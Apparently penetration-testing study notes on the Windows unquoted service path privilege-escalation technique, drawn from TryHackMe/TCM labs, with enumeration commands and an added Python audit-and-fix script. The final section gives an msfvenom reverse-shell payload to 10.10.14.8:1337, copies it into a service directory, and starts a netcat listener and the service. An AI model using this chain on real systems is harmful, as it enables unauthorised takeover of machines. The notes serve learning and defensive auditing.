Unquoted Service Paths

Overview

Unquoted service path exploitation is similar to binary path exploitation; however, the vulnerability lies in the fact that the path to the executable is unquoted.

When the service is started, Windows splits the path at each space and, for every resulting prefix, tests whether that prefix with .exe appended exists:

  • C:\Program.exe - NO

  • C:\Program Files.exe - NO

  • C:\Program Files\Unquoted.exe - NO

  • C:\Program Files\Unquoted Path.exe - NO

And so on...

Manual Exploitation

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
sc.exe qc iobitunsvr
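
An added example, not part of the original notes: Python that reproduces the search order from the Overview for a list of service ImagePath values, flags the unquoted ones (the condition the wmic filter above looks for), and produces the quoted form that removes the ambiguity. The service names, paths and function names are constructed for illustration, and the rule for where arguments begin is a stated assumption.

```python
import re

# Constructed sample (service name, ImagePath) pairs; not from a real host.
SAMPLE_SERVICES = [
    ("svc_unquoted", r"C:\Program Files\Unquoted Path Service\Common Files\svc.exe"),
    ("svc_quoted", r'"C:\Program Files\Quoted Service\svc.exe" -k run'),
    ("svc_nospace", r"C:\Tools\agent.exe --service"),
    ("svc_args", r"C:\Program Files\Vendor\daemon.exe /start now"),
]

# Assumption: in an unquoted ImagePath the real binary ends at the first ".exe"
# followed by whitespace or end of string; the rest is arguments.
_EXE_END = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)

def executable_part(image_path):
    """Return (executable path, was_quoted) for an ImagePath string."""
    path = image_path.strip()
    if path.startswith('"'):
        return path[1:].split('"', 1)[0], True
    m = _EXE_END.search(path)
    return (path[:m.end()] if m else path), False

def _with_exe(prefix):
    # .exe is appended only when the last component has no extension.
    return prefix if "." in prefix.rsplit("\\", 1)[-1] else prefix + ".exe"

def candidate_paths(image_path):
    """Paths tested, in order, before the intended binary (empty if quoted)."""
    exe, quoted = executable_part(image_path)
    if quoted:
        return []
    parts = exe.split(" ")
    return [_with_exe(" ".join(parts[:i])) for i in range(1, len(parts))]

def audit(services):
    """Map each service with an unquoted, space-containing path to its candidates."""
    return {name: c for name, p in services if (c := candidate_paths(p))}

def quoted_fix(image_path):
    """Mitigation: the same ImagePath with the executable wrapped in quotes."""
    exe, quoted = executable_part(image_path)
    stripped = image_path.strip()
    return stripped if quoted else f'"{exe}"' + stripped[len(exe):]

if __name__ == "__main__":
    for name, cands in audit(SAMPLE_SERVICES).items():
        print(name, "->", cands)
```

Each flagged service is remediated by storing the value returned by quoted_fix as its ImagePath and by checking that unprivileged users cannot write to the directories the candidate paths fall in.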

Exploitation via PowerUp

Run PowerUp and look for the Unquoted Service Paths section.

TCM Windows Priv Esc Try Hack Me

Create and drop a malicious executable

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1337 -f exe -o Common.exe
copy C:\temp\Common.exe "C:\Program Files\Unquoted Path Service\Common.exe"

Start a listener and the service

nc -lnvp 1337
sc.exe start unquotedsvc
